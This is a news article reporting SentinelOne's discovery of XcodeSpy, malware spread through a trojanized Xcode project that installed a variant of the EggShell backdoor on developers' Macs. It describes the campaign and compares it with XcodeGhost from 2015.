According to researchers, XcodeSpy malware is targeting Xcode Developers in a supply-check attack.
The commonly known secure MacOS has been infiltrated by malware again that has been used by unknown threat actors to target developers who use Xcode integrated development environment (IDE).
Threat actors have recently started making malicious versions of popular projects in the hopes of luring developers to include them in their applications. When these applications are compiled, the malicious component will infect their computer in a supply-chain attack.
The malware, named XcodeSpy, was disguised to deliver a custom variant of a backdoor known as EggShell which allows its operators to spy on users and it was discovered by the IT security researchers at SentinelOne on Thursday.
This backdoor can also give the threat actors access to upload and download files, capture data from the victim’s camera, microphone, and keyboard.
SentinelOne’s report states that they got to know about the malware from an anonymous researcher but the company did also come across XcodeSpy back in late 2020 targeting an organization in the US.
SentinelOne was informed by the victim that it is being regularly targeted by threat actors linked to North Korea and they came across it while conducting threat hunting activities.
There has been cross-referenced evidence found that states how the campaign involving XcodeSpy was active at least between July and October 2020. The malware was also once delivered as a trojanized version of an open-source Xcode project offered to iOS developers.
The company has not yet found any other trojanized Xcode projects but believes that other similar malicious projects could exist.
Additionally, researchers believe that since this is not the first piece of malware that has been created to target Xcode developers, it is highly likely that another one would resurface again until the threat actors are brought to light.
Back in 2015, a similar threat named XcodeGhost allowed attackers to inject malicious code into hundreds of legitimate applications which used rogue versions of Xcode that developers downloaded from third-party websites.
It is possible that XcodeSpy may have been targeted at a specific developer or group but there are other potential scenarios with such high-value victims.